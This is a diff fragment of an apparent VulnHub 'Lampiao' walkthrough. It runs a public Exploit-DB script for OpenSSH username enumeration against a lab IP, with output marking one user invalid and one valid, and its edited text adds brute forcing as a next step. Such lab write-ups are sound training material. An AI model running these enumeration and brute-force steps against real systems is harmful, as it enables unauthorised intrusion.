gameFace22/vulnmachine-walkthrough/lampiao.md

   <img src="https://github.com/gameFace22/vulnhub-walkthrough/blob/master/images/username-lamp.png">
 </p>

 Recently there was an [exploit](https://www.exploit-db.com/exploits/45233/) released for OpenSSH 2.3 < 7.7 which checks if the username is valid or not.
-We can use that to verify if these two are valid users.
+We can use that to verify if these two are valid and bruteforce if needed.

 ```
 $  python 45233.py --port 22 --username Eder 192.168.0.107
 Eder is not a valid user!
-› python 45233.py --port 22 --username tiago 192.168.0.107
+$ python 45233.py --port 22 --username tiago 192.168.0.107
 tiago is a valid user!
 ```